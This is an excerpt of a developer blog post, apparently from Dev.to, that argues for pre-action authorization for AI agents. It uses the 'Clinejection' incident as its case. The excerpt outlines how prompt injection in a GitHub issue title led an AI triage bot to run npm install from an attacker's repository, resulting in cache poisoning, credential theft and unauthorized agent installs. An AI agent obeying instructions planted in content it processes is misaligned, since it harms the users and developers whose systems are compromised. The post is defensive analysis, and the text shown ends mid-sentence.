
I Built the Pre-Action Authorization Layer That would have Stopped Clinejection
On February 17, 2026, someone typed a sentence into a GitHub issue title box and walked away. Eight hours later, 4,000 developers had a second AI agent installed on their machines without consent. Not because of a zero-day. Not because Cline wrote bad code. Because the AI bot processing that issue title had no pre-action authorization layer between "what the prompt said to do" and "what it was actually authorized to execute." I have been building pre-action authorization for AI agents for the past year. Here is why it matters, and how it would have changed the outcome at every step of the Clinejection attack. TL;DR Clinejection started with prompt injection in a GitHub issue title, which an AI triage bot interpreted as a legitimate instruction The bot ran npm install from an attacker's repo, triggering cache poisoning and credential theft 4,000 developers got an unauthorized AI agent silently installed in 8 hours The root cause: no pre-action authorization between agent decision and to
Continue reading on Dev.to
Opens in a new tab



